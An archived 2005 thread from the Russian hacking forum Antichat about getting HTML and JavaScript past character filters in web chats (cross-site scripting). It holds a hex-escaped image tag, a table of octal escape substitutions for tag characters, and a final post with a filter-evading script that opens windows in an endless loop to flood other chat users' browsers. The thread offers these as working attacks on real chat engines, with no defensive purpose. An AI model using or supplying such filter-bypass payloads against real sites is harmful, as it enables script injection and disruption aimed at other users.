Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Замена символов в чате! (https://forum.antichat.xyz/showthread.php?t=8247)

D1ma 23.07.2005 01:53

Замена символов в чате!
 
На одном из чатов запнулся на том что там не разрешалось т.е. в тэгах непропускался знак /
Это означает что если я пишу:
\x3cimg src="http\x3a//antichat.ru/cgi-bin/s.jpg" name="imaga"\x3e
то тэг попадает на обозрение(ПОЛНОСТЬЮ) в таком виде: ...x3cimg src="http...x3a......antichat.ru...cgi-bin...s.jpg" name="imaga"...x3e
Как можно заменить / ????

KEZ 23.07.2005 03:16

см. видео zFailure "XSS в чате на muz-tv"
там тебе покажут как использовать реплейс символов в строке в ХТМЛ

К.е.Н 23.07.2005 12:47

А какой двиг чата.То что ты написал это phpmychat 0.14 .5 . Ну че то вроде этого.Это старый двиг .Вот попробуй для нового < =\\74\
> = \\76\\
</ =\\74/
: = \\72
Понятно?

D1ma 23.07.2005 14:14

Вот этот пропатченный чат! http://www.elbrusoid.org/chat

К.е.Н 23.07.2005 14:34

Там этот баг закрыт.И правильно но еще много уязвимостей осталось

D1ma 23.07.2005 17:50

Кто-нить выложите тэг на открытие окошек в чате.

TANZWUT 28.07.2005 11:48

Цитата:

Сообщение от D1ma
Кто-нить выложите тэг на открытие окошек в чате.

Смотри про чаты августа... тама тег мною выложен.....

GreenBear 28.07.2005 12:02

функция window.open na JS
на HTML <a href=page.htm target=_blank <!-- если надо в новом окне -->>link</a>

D1ma 01.08.2005 01:21

ВСЕМ ОГРОМНОЕ СПАСИБО!!!!

К.е.Н 01.08.2005 15:11

\\74\script language="javascript"\\76\\ var nameData = "007"; if (nameData == prompt ("*****" ))alert("************!"); else for(1;1;100) open(1);\\74\/script\\76\\
Вот уже переделаный


Время: 03:23